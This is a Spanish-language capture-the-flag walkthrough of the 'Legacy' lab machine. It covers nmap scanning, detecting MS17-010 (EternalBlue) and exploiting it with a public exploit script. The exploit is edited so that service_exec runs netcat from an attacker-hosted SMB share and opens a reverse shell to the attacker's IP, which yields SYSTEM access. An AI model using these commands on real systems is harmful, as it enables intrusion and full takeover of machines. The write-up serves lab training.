Legacy

Comenzamos la maquina enumerando los puertos abiertos con nmap, enumeraremos todos los puertos con el parámetro -p- y filtraremos solo los puertos que estén abiertos.

sudo nmap -p- --open -sS -min-rate 5000 -Pn -n 10.129.227.181 -oG allPorts

Aquí vemos los puertos abiertos de la maquina victima, vamos a lanzar una enumeración para que nos muestre más información de los servicios, como versiones, dominio, aplicación.

nmap -sCV -p135,139,445 10.129.227.181 -Pn -oN target

No vemos nada interesante, solo los puertos 139,445 abiertos. Vamos a lanzar un script de nmap para detectar si es vulnerable algún exploit que tiene nmap por defecto.

nmap -p445 --script "vuln" 10.129.227.181

Vemos que tiene una vulnerabilidad, MS17-010 (esta maquina es similar ha Blue). Vamos a buscar el mismo exploit que usamos para la maquina Blue.

Permite a atacantes remotos ejecutar código arbitrario a través de paquetes diseñados, también conocida como "vulnerabilidad de ejecución remota de código SMB en Windows".

https://nvd.nist.gov/vuln/detail/cve-2017-0144

Vamos al enlace https://github.com/worawit/MS17-010 y nos descargamos el repositorio.

Esta vez lanzaremos el checker.py sin agregarle ningun usuario "guest".

Nos dara un pipe.

Nos iremos al archivo zzz_exploit.py y comentaremos todas las líneas de este apartado y desmarcamos la línea de service_exec.

service_exec(conn, r'cmd /c \\10.10.16.31\smbFolder\nc.exe -e cmd 10.10.16.31 443')

Tendremos que crear un recurso compartido para que ejecute netcat en la maquina victima y conseguir la reverse shell.

Nos pondremos también en escucha con netcat para recibir la reverse shell.

Una vez compartimos el recurso, lanzamos zzz_exploit.py con el pipe spoolss.

Esperamos un poco ha que termine de ejecutarse el script y vemos en el netcat que tenemos la reverse shell.

Con esto somos NT AUTHORITY\SYSTEM.